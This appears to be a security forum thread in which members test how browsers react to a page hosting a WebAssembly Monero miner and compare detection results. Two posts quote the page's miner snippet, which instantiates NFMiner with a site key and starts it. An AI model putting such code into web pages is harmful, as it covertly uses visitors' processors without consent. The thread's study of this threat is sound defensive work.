App Review Browsers vs In Browser CryptoCurrency Miners

It is advised to take all reviews with a grain of salt. In extreme cases some reviews use dramatization for entertainment purposes.

cruelsister

Level 43
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 13, 2013
3,224
This video demonstrates a specific Monero webassembly/Jscript Miner, demonstrating that not all browsers are alike at default. Note that in a majority of cases all browsers will fail.

No earthshaking revelations here, just a fun demo video for those that may not have dealt with these Miners before.

 

Av Gurus

Level 29
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Sep 22, 2014
1,767
...this web page still not detected (accept Fortinet)...

Clipboard01.jpg

VirusTotal
 

TairikuOkami

Level 37
Verified
Top Poster
Content Creator
Well-known
May 13, 2017
2,641
...this web page still not detected (accept Fortinet)...
Is it still alive? I have tried all browsers and not a problem. I guess it depends on system settings as well then.
 

Attachments

  • Untitled.jpg
    Untitled.jpg
    437.5 KB · Views: 424
  • Like
Reactions: mekelek

upnorth

Level 68
Verified
Top Poster
Malware Hunter
Well-known
Jul 27, 2015
5,458
Thanks for the share! (y)

I wonder the same as @TairikuOkami because when I test the url with Opera the latest stable version 51.0.2830.55 and with no addons enabled and without the Block Ads option my CPU is idle on 2%. Perhaps it's blocked on the ISP level? :unsure:
 
Last edited:

upnorth

Level 68
Verified
Top Poster
Malware Hunter
Well-known
Jul 27, 2015
5,458
This was interesting IMO :
Code:
var miner = new NFMiner("186ea", {load: "low"});

NF WebMiner lets you mine for Monero using your visitors' CPU power. Just get your mining key below, enter a few lines of HTML/JavaScript in your web pages and start monetizing your website.

Your profit will vary depending on the number of visitors, the time they have the page open and their processing power. Our miner uses WebAssembly which gives the maximum performance, however you probably can expect on average 25-30 H/s per visitor.
 

cruelsister

Level 43
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 13, 2013
3,224
A fun fact about the website used- whoever is behind the Miner has their identity protected as they went through a Domain Privacy business (Whois Privacy Corp). This server is (or at least was) in Germany and the contact information is listed as Nassau, The Bahamas.

A great deal of scamming is brokered by Whois, and they've been sued a number of times from companies like De Beers to people like John Stamos. They also hosted a few of the Russian Troll sites of the boys from St, Pete that were involved in the US Election Abuse matter; and of course they also frequently use CloudFlare farms.
 

Prorootect

Level 69
Verified
Nov 5, 2011
5,855
Yes miner script is here, but not mining for now...
On Cent browser (but nothing seen in Console):
"<!--<script src="lib/miner.js"></script>
<script>
var miner = new NFMiner("186ea", {load: "low"});
miner.start();
</script>-->"
... and too on Firefox Nightly. No possiblity to copy from DOM and Style Inspector, and nothing seen in Console...
Bookmarked.

Thanks, cruelsister !
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top